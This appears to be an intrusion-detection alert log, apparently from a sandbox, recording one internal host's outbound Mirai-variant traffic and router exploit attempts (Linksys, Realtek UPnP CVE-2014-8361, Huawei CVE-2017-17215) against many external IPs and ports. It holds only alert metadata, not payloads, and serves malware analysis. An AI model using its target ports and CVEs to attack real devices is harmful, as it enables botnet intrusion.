192.168.2.2395.216.103.12651132802027121 05/14/22-02:12:00.196178	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51132	80	192.168.2.23	95.216.103.126
192.168.2.2395.143.57.7852982802027121 05/14/22-02:12:04.729513	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52982	80	192.168.2.23	95.143.57.78
192.168.2.23156.244.70.10233740528692027339 05/14/22-02:13:13.435280	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	33740	52869	192.168.2.23	156.244.70.102
192.168.2.2395.59.176.8254556802027121 05/14/22-02:13:33.021265	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54556	80	192.168.2.23	95.59.176.82
192.168.2.2395.100.1.5849178802027121 05/14/22-02:11:48.348956	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	49178	80	192.168.2.23	95.100.1.58
192.168.2.2395.214.135.17752978802027121 05/14/22-02:12:04.793804	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52978	80	192.168.2.23	95.214.135.177
192.168.2.2395.101.46.19543134802027121 05/14/22-02:12:13.698098	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43134	80	192.168.2.23	95.101.46.195
192.168.2.2395.216.173.24048368802027121 05/14/22-02:12:21.633415	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48368	80	192.168.2.23	95.216.173.240
192.168.2.2395.241.182.14738286802027121 05/14/22-02:13:29.655470	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38286	80	192.168.2.23	95.241.182.147
192.168.2.2395.168.228.20548254802027121 05/14/22-02:12:12.332916	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48254	80	192.168.2.23	95.168.228.205
192.168.2.23172.65.127.3248576555552027153 05/14/22-02:12:11.570325	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	48576	55555	192.168.2.23	172.65.127.32
192.168.2.23197.246.204.4543450372152835222 05/14/22-02:12:18.232296	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	43450	37215	192.168.2.23	197.246.204.45
192.168.2.23172.65.246.12360432555552027153 05/14/22-02:13:32.017204	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	60432	55555	192.168.2.23	172.65.246.123
192.168.2.2395.100.34.12649942802027121 05/14/22-02:12:08.354729	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	49942	80	192.168.2.23	95.100.34.126
192.168.2.23172.65.187.18739546555552027153 05/14/22-02:12:18.490698	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39546	55555	192.168.2.23	172.65.187.187
192.168.2.2395.217.202.21857140802027121 05/14/22-02:12:33.688142	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57140	80	192.168.2.23	95.217.202.218
192.168.2.23156.244.117.6735262528692027339 05/14/22-02:13:29.101550	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	35262	52869	192.168.2.23	156.244.117.67
192.168.2.2395.9.132.13054534802027121 05/14/22-02:12:09.942371	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54534	80	192.168.2.23	95.9.132.130
192.168.2.23172.65.207.17255164555552027153 05/14/22-02:12:51.455000	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	55164	55555	192.168.2.23	172.65.207.172
192.168.2.23156.235.102.24651258528692027339 05/14/22-02:12:57.282371	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	51258	52869	192.168.2.23	156.235.102.246
192.168.2.23172.65.165.8142906555552027153 05/14/22-02:12:20.938959	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	42906	55555	192.168.2.23	172.65.165.81
192.168.2.23172.65.220.23039706555552027153 05/14/22-02:13:40.490274	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39706	55555	192.168.2.23	172.65.220.230
192.168.2.2395.211.206.8055016802027121 05/14/22-02:12:21.658731	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55016	80	192.168.2.23	95.211.206.80
192.168.2.2395.59.17.5441456802027121 05/14/22-02:12:57.823951	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41456	80	192.168.2.23	95.59.17.54
192.168.2.2395.76.246.19645190802027121 05/14/22-02:12:09.885059	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45190	80	192.168.2.23	95.76.246.196
192.168.2.2395.209.155.9051672802027121 05/14/22-02:11:50.439816	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51672	80	192.168.2.23	95.209.155.90
192.168.2.23172.65.232.20460168555552027153 05/14/22-02:13:25.199760	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	60168	55555	192.168.2.23	172.65.232.204
192.168.2.2395.100.77.14644630802027121 05/14/22-02:12:01.373432	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44630	80	192.168.2.23	95.100.77.146
192.168.2.23172.65.31.22744132555552027153 05/14/22-02:11:53.487585	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44132	55555	192.168.2.23	172.65.31.227
192.168.2.2395.57.72.060930802027121 05/14/22-02:12:48.985965	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60930	80	192.168.2.23	95.57.72.0
192.168.2.2395.101.45.15553358802027121 05/14/22-02:12:04.731576	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53358	80	192.168.2.23	95.101.45.155
192.168.2.2395.87.101.10137896802027121 05/14/22-02:12:09.913804	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	37896	80	192.168.2.23	95.87.101.101
192.168.2.2395.101.128.23660108802027121 05/14/22-02:13:28.455410	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60108	80	192.168.2.23	95.101.128.236
192.168.2.2395.142.205.9451290802027121 05/14/22-02:11:46.047218	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51290	80	192.168.2.23	95.142.205.94
192.168.2.2388.193.167.16734318802027121 05/14/22-02:13:46.134686	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34318	80	192.168.2.23	88.193.167.167
192.168.2.2395.70.197.19856656802027121 05/14/22-02:12:31.405561	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56656	80	192.168.2.23	95.70.197.198
192.168.2.23172.65.164.5346232555552027153 05/14/22-02:13:23.081529	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46232	55555	192.168.2.23	172.65.164.53
192.168.2.2395.225.205.13049890802027121 05/14/22-02:12:04.853611	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	49890	80	192.168.2.23	95.225.205.130
192.168.2.2395.100.50.13952924802027121 05/14/22-02:12:08.365983	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52924	80	192.168.2.23	95.100.50.139
192.168.2.23156.241.125.9145474528692027339 05/14/22-02:12:41.657241	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	45474	52869	192.168.2.23	156.241.125.91
192.168.2.2395.9.125.14353942802027121 05/14/22-02:12:13.735890	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53942	80	192.168.2.23	95.9.125.143
192.168.2.23156.232.92.24755310528692027339 05/14/22-02:12:25.129479	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	55310	52869	192.168.2.23	156.232.92.247
192.168.2.2395.90.154.22936880802027121 05/14/22-02:12:12.602828	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36880	80	192.168.2.23	95.90.154.229
192.168.2.2395.216.15.13056598802027121 05/14/22-02:12:21.676533	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56598	80	192.168.2.23	95.216.15.130
192.168.2.2395.142.10.21251574802027121 05/14/22-02:12:25.898635	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51574	80	192.168.2.23	95.142.10.212
192.168.2.2395.110.175.2748086802027121 05/14/22-02:11:50.439638	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48086	80	192.168.2.23	95.110.175.27
192.168.2.2395.216.36.21353936802027121 05/14/22-02:12:03.575828	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53936	80	192.168.2.23	95.216.36.213
192.168.2.2395.101.218.17560614802027121 05/14/22-02:12:33.782516	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60614	80	192.168.2.23	95.101.218.175
192.168.2.2395.140.158.2838122802027121 05/14/22-02:11:46.150628	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38122	80	192.168.2.23	95.140.158.28
192.168.2.2395.163.132.2455816802027121 05/14/22-02:11:52.586510	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55816	80	192.168.2.23	95.163.132.24
192.168.2.23172.65.206.17358940555552027153 05/14/22-02:12:01.300119	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	58940	55555	192.168.2.23	172.65.206.173
192.168.2.23172.65.177.13744728555552027153 05/14/22-02:13:32.012600	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44728	55555	192.168.2.23	172.65.177.137
192.168.2.2395.179.233.6956756802027121 05/14/22-02:11:48.288985	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56756	80	192.168.2.23	95.179.233.69
192.168.2.23172.65.2.844980555552027153 05/14/22-02:12:11.570145	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44980	55555	192.168.2.23	172.65.2.8
192.168.2.23172.65.117.6952368555552027153 05/14/22-02:13:43.822344	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	52368	55555	192.168.2.23	172.65.117.69
192.168.2.2395.159.7.4138836802027121 05/14/22-02:11:52.872714	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38836	80	192.168.2.23	95.159.7.41
192.168.2.23172.65.89.23448884555552027153 05/14/22-02:12:00.125203	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	48884	55555	192.168.2.23	172.65.89.234
192.168.2.2395.57.98.21044138802027121 05/14/22-02:13:14.994328	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44138	80	192.168.2.23	95.57.98.210
192.168.2.2395.110.232.9756464802027121 05/14/22-02:11:55.012285	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56464	80	192.168.2.23	95.110.232.97
192.168.2.2395.8.72.19347014802027121 05/14/22-02:11:55.040749	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47014	80	192.168.2.23	95.8.72.193
192.168.2.2395.47.97.7036228802027121 05/14/22-02:12:03.534557	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36228	80	192.168.2.23	95.47.97.70
192.168.2.23172.65.37.24335642555552027153 05/14/22-02:12:06.228008	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	35642	55555	192.168.2.23	172.65.37.243
192.168.2.2395.182.120.23638966802027121 05/14/22-02:11:50.412772	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38966	80	192.168.2.23	95.182.120.236
192.168.2.23172.65.10.053968555552027153 05/14/22-02:12:11.587321	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	53968	55555	192.168.2.23	172.65.10.0
192.168.2.2395.154.112.12243126802027121 05/14/22-02:12:24.008186	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43126	80	192.168.2.23	95.154.112.122
192.168.2.2395.100.203.4046200802027121 05/14/22-02:12:36.296341	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46200	80	192.168.2.23	95.100.203.40
192.168.2.2388.99.143.5535064802027121 05/14/22-02:12:39.835523	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35064	80	192.168.2.23	88.99.143.55
192.168.2.2395.134.255.2857518802027121 05/14/22-02:11:48.410937	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57518	80	192.168.2.23	95.134.255.28
192.168.2.23156.226.106.12749420528692027339 05/14/22-02:12:59.756210	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	49420	52869	192.168.2.23	156.226.106.127
192.168.2.23156.241.77.21936828528692027339 05/14/22-02:12:37.410964	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	36828	52869	192.168.2.23	156.241.77.219
192.168.2.2388.147.125.1157218802027121 05/14/22-02:12:43.278898	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57218	80	192.168.2.23	88.147.125.11
192.168.2.2395.159.31.9139228802027121 05/14/22-02:12:57.701159	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39228	80	192.168.2.23	95.159.31.91
192.168.2.2395.101.33.10038818802027121 05/14/22-02:11:52.573122	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38818	80	192.168.2.23	95.101.33.100
192.168.2.2395.100.154.14133290802027121 05/14/22-02:11:55.048182	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	33290	80	192.168.2.23	95.100.154.141
192.168.2.2395.181.216.18039938802027121 05/14/22-02:12:08.396424	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39938	80	192.168.2.23	95.181.216.180
192.168.2.23172.65.239.20157596555552027153 05/14/22-02:12:36.880675	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	57596	55555	192.168.2.23	172.65.239.201
192.168.2.2395.58.3.1548388802027121 05/14/22-02:13:22.563201	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48388	80	192.168.2.23	95.58.3.15
192.168.2.2395.57.255.13244390802027121 05/14/22-02:12:33.932176	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44390	80	192.168.2.23	95.57.255.132
192.168.2.2395.154.52.14257790802027121 05/14/22-02:13:00.782189	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57790	80	192.168.2.23	95.154.52.142
192.168.2.2395.101.95.17957846802027121 05/14/22-02:12:03.507219	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57846	80	192.168.2.23	95.101.95.179
192.168.2.2395.140.153.15856040802027121 05/14/22-02:12:28.223713	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56040	80	192.168.2.23	95.140.153.158
192.168.2.23172.65.108.14133886555552027153 05/14/22-02:12:33.795226	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33886	55555	192.168.2.23	172.65.108.141
192.168.2.23156.225.158.3853788528692027339 05/14/22-02:12:20.524009	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	53788	52869	192.168.2.23	156.225.158.38
192.168.2.23156.250.15.17939434528692027339 05/14/22-02:12:33.756550	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	39434	52869	192.168.2.23	156.250.15.179
192.168.2.2395.101.50.16159636802027121 05/14/22-02:12:12.544980	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59636	80	192.168.2.23	95.101.50.161
192.168.2.2395.217.114.19941138802027121 05/14/22-02:12:33.730021	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41138	80	192.168.2.23	95.217.114.199
192.168.2.2395.21.50.339374802027121 05/14/22-02:12:04.793956	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39374	80	192.168.2.23	95.21.50.3
192.168.2.23172.65.99.15639658555552027153 05/14/22-02:12:07.296438	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39658	55555	192.168.2.23	172.65.99.156
192.168.2.2395.65.49.5341268802027121 05/14/22-02:12:31.453562	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41268	80	192.168.2.23	95.65.49.53
192.168.2.23172.65.161.25046236555552027153 05/14/22-02:12:11.570256	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46236	55555	192.168.2.23	172.65.161.250
192.168.2.2395.183.206.250534802027121 05/14/22-02:12:12.345070	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50534	80	192.168.2.23	95.183.206.2
192.168.2.23172.65.29.14935424555552027153 05/14/22-02:13:03.185493	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	35424	55555	192.168.2.23	172.65.29.149
192.168.2.2395.56.57.11935020802027121 05/14/22-02:13:09.123139	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35020	80	192.168.2.23	95.56.57.119
192.168.2.23172.65.3.12749930555552027153 05/14/22-02:13:09.596926	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	49930	55555	192.168.2.23	172.65.3.127
192.168.2.2395.101.190.17742846802027121 05/14/22-02:12:12.333017	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	42846	80	192.168.2.23	95.101.190.177
192.168.2.2395.216.136.10545390802027121 05/14/22-02:12:38.435082	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45390	80	192.168.2.23	95.216.136.105
192.168.2.2395.100.227.17041112802027121 05/14/22-02:12:12.383299	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41112	80	192.168.2.23	95.100.227.170
192.168.2.2395.30.250.18660900802027121 05/14/22-02:12:41.134897	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60900	80	192.168.2.23	95.30.250.186
192.168.2.2395.110.219.25258002802027121 05/14/22-02:12:06.988408	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58002	80	192.168.2.23	95.110.219.252
192.168.2.23156.250.93.9246958528692027339 05/14/22-02:12:13.854287	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	46958	52869	192.168.2.23	156.250.93.92
192.168.2.23172.65.179.13846560555552027153 05/14/22-02:13:25.217133	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46560	55555	192.168.2.23	172.65.179.138
192.168.2.2395.130.158.8946304802027121 05/14/22-02:11:48.322037	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46304	80	192.168.2.23	95.130.158.89
192.168.2.23172.65.196.4033988555552027153 05/14/22-02:12:00.108181	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33988	55555	192.168.2.23	172.65.196.40
192.168.2.2395.56.15.14946206802027121 05/14/22-02:12:33.933501	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46206	80	192.168.2.23	95.56.15.149
192.168.2.2395.164.211.13740294802027121 05/14/22-02:12:23.952380	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40294	80	192.168.2.23	95.164.211.137
192.168.2.2395.59.240.14948520802027121 05/14/22-02:11:58.029242	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48520	80	192.168.2.23	95.59.240.149
192.168.2.2395.179.190.9935494802027121 05/14/22-02:11:48.314156	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35494	80	192.168.2.23	95.179.190.99
192.168.2.2395.183.11.24036174802027121 05/14/22-02:11:52.658094	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36174	80	192.168.2.23	95.183.11.240
192.168.2.2395.216.24.12135232802027121 05/14/22-02:12:18.537644	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35232	80	192.168.2.23	95.216.24.121
192.168.2.23197.214.98.18056372372152835222 05/14/22-02:12:31.482188	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	56372	37215	192.168.2.23	197.214.98.180
192.168.2.2395.130.253.2236174802027121 05/14/22-02:11:57.640340	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36174	80	192.168.2.23	95.130.253.22
192.168.2.23172.65.96.4351198555552027153 05/14/22-02:13:43.804838	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	51198	55555	192.168.2.23	172.65.96.43
192.168.2.2395.250.149.8654382802027121 05/14/22-02:12:38.401526	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54382	80	192.168.2.23	95.250.149.86
192.168.2.23172.65.63.12143308555552027153 05/14/22-02:13:00.154647	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	43308	55555	192.168.2.23	172.65.63.121
192.168.2.2395.217.58.15941126802027121 05/14/22-02:12:01.397400	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41126	80	192.168.2.23	95.217.58.159
192.168.2.2395.6.91.3641418802027121 05/14/22-02:12:07.016180	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41418	80	192.168.2.23	95.6.91.36
192.168.2.2395.111.197.18852578802027121 05/14/22-02:12:34.070826	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52578	80	192.168.2.23	95.111.197.188
192.168.2.2388.83.108.14946180802027121 05/14/22-02:13:39.640695	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46180	80	192.168.2.23	88.83.108.149
192.168.2.2395.227.161.2454070802027121 05/14/22-02:13:29.632794	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54070	80	192.168.2.23	95.227.161.24
192.168.2.2395.255.117.23858354802027121 05/14/22-02:12:53.425616	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58354	80	192.168.2.23	95.255.117.238
192.168.2.2395.179.234.3754506802027121 05/14/22-02:12:07.018103	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54506	80	192.168.2.23	95.179.234.37
192.168.2.2395.9.225.10248152802027121 05/14/22-02:11:48.334081	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48152	80	192.168.2.23	95.9.225.102
192.168.2.2395.164.218.19550980802027121 05/14/22-02:11:52.750159	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50980	80	192.168.2.23	95.164.218.195
192.168.2.23172.65.248.24245400555552027153 05/14/22-02:13:08.573609	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	45400	55555	192.168.2.23	172.65.248.242
192.168.2.2395.238.139.1348666802027121 05/14/22-02:12:25.914760	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48666	80	192.168.2.23	95.238.139.13
192.168.2.2395.179.247.15952292802027121 05/14/22-02:12:04.767954	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52292	80	192.168.2.23	95.179.247.159
192.168.2.23172.65.47.23260828555552027153 05/14/22-02:12:26.254915	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	60828	55555	192.168.2.23	172.65.47.232
192.168.2.2388.208.78.17954476802027121 05/14/22-02:13:11.528734	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	54476	80	192.168.2.23	88.208.78.179
192.168.2.2395.155.229.23450038802027121 05/14/22-02:12:47.723727	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50038	80	192.168.2.23	95.155.229.234
192.168.2.2395.101.33.10038886802027121 05/14/22-02:11:53.949765	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38886	80	192.168.2.23	95.101.33.100
192.168.2.2395.159.55.21435902802027121 05/14/22-02:13:17.206694	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35902	80	192.168.2.23	95.159.55.214
192.168.2.2395.163.12.16845128802027121 05/14/22-02:12:38.483919	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45128	80	192.168.2.23	95.163.12.168
192.168.2.23156.238.47.1252070528692027339 05/14/22-02:12:00.693831	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	52070	52869	192.168.2.23	156.238.47.12
192.168.2.2395.80.200.20139330802027121 05/14/22-02:12:36.296587	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39330	80	192.168.2.23	95.80.200.201
192.168.2.23156.254.110.8237370528692027339 05/14/22-02:13:45.786874	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	37370	52869	192.168.2.23	156.254.110.82
192.168.2.2395.154.210.9359854802027121 05/14/22-02:11:45.992850	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59854	80	192.168.2.23	95.154.210.93
192.168.2.2395.100.125.8853800802027121 05/14/22-02:12:25.889391	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53800	80	192.168.2.23	95.100.125.88
192.168.2.23172.65.48.14949556555552027153 05/14/22-02:12:40.957123	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	49556	55555	192.168.2.23	172.65.48.149
192.168.2.23172.65.35.23239748555552027153 05/14/22-02:12:51.437608	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39748	55555	192.168.2.23	172.65.35.232
192.168.2.23156.247.19.19837608528692027339 05/14/22-02:12:24.973762	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	37608	52869	192.168.2.23	156.247.19.198
192.168.2.2395.154.49.5858606802027121 05/14/22-02:12:28.144267	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58606	80	192.168.2.23	95.154.49.58
192.168.2.2395.223.48.4155004802027121 05/14/22-02:11:45.963936	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	55004	80	192.168.2.23	95.223.48.41
192.168.2.23172.65.74.11136330555552027153 05/14/22-02:13:08.554571	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	36330	55555	192.168.2.23	172.65.74.111
192.168.2.2395.217.212.15044942802027121 05/14/22-02:12:06.989043	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44942	80	192.168.2.23	95.217.212.150
192.168.2.2395.58.2.16337560802027121 05/14/22-02:13:23.571844	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	37560	80	192.168.2.23	95.58.2.163
192.168.2.23156.226.87.8944194528692027339 05/14/22-02:13:39.931274	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	44194	52869	192.168.2.23	156.226.87.89
192.168.2.2395.211.210.5351742802027121 05/14/22-02:12:12.345964	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51742	80	192.168.2.23	95.211.210.53
192.168.2.2395.217.237.9747216802027121 05/14/22-02:12:33.770644	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47216	80	192.168.2.23	95.217.237.97
192.168.2.23172.65.239.8641954555552027153 05/14/22-02:12:16.079208	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	41954	55555	192.168.2.23	172.65.239.86
192.168.2.2395.211.229.20751322802027121 05/14/22-02:12:31.379545	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51322	80	192.168.2.23	95.211.229.207
192.168.2.2395.101.154.15835774802027121 05/14/22-02:12:38.368211	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	35774	80	192.168.2.23	95.101.154.158
192.168.2.2395.154.100.7638420802027121 05/14/22-02:12:13.843893	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38420	80	192.168.2.23	95.154.100.76
